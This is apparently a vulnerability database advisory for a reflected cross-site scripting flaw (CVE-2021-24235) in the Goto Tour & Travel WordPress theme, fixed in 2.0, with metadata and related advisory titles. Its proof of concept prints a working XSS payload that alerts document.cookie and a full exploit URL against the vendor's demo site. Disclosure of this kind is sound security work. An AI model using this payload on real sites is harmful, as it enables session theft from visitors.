Goto – Tour & Travel < 2.0 – Unauthenticated Reflected XSS | CVE 2021-24235 | Theme Vulnerabilities

Description

The theme does not sanitise the keywords and start_date GET parameter on its Tour List page, leading to an unauthenticated reflected Cross-Site Scripting issue.

Proof of Concept

Payload: <input/Autofocus/%0D*/Onfocus=alert(`m0ze`);alert(document.cookie);//>

https://boostifythemes.com/demo/wp/goto/tour-list/?keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28%60m0ze%60%29%3Balert%28document.cookie%29%3B%2F%2F%3E&start_date=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28%60m0ze%60%29%3Balert%28document.cookie%29%3B%2F%2F%3E&avaibility=13

Affects Themes

Fixed in 2.0

References

CVE

URL

https://m0ze.ru/vulnerability/[2021-02-10]-[WordPress]-[CWE-79]-Goto-WordPress-Theme-v1.9.txt

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

m0ze

Submitter

m0ze

Submitter website

https://m0ze.ru

Submitter twitter

Verified

Yes

WPVDB ID

eece90aa-582b-4c49-8b7c-14027f9df139

Timeline

Publicly Published

2021-03-31 (about 4 years ago)

Added

2021-03-31 (about 4 years ago)

Last Updated

2021-04-01 (about 4 years ago)

Other

Published

Title

Published

2021-11-02

Title

WP All Import < 3.6.3 - Admin+ Stored Cross-Site Scripting

Published

2025-05-07

Title

WP SEO Structured Data Schema < 2.8.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via Plugin Settings

Published

2024-10-10

Title

Embed videos and respect privacy < 1.3 - Reflected Cross-Site Scripting

Published

2025-01-16

Title

Mass Messaging in BuddyPress <= 2.2.1 - Reflected Cross-Site Scripting

Published

2021-09-20

Title

WP Cookie Choice <= 1.1.0 - CSRF to Stored Cross-Site Scripting